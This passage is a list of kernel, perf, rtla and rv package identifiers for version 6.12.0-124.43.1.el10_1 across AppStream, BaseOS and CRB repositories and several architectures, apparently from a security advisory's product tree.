"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
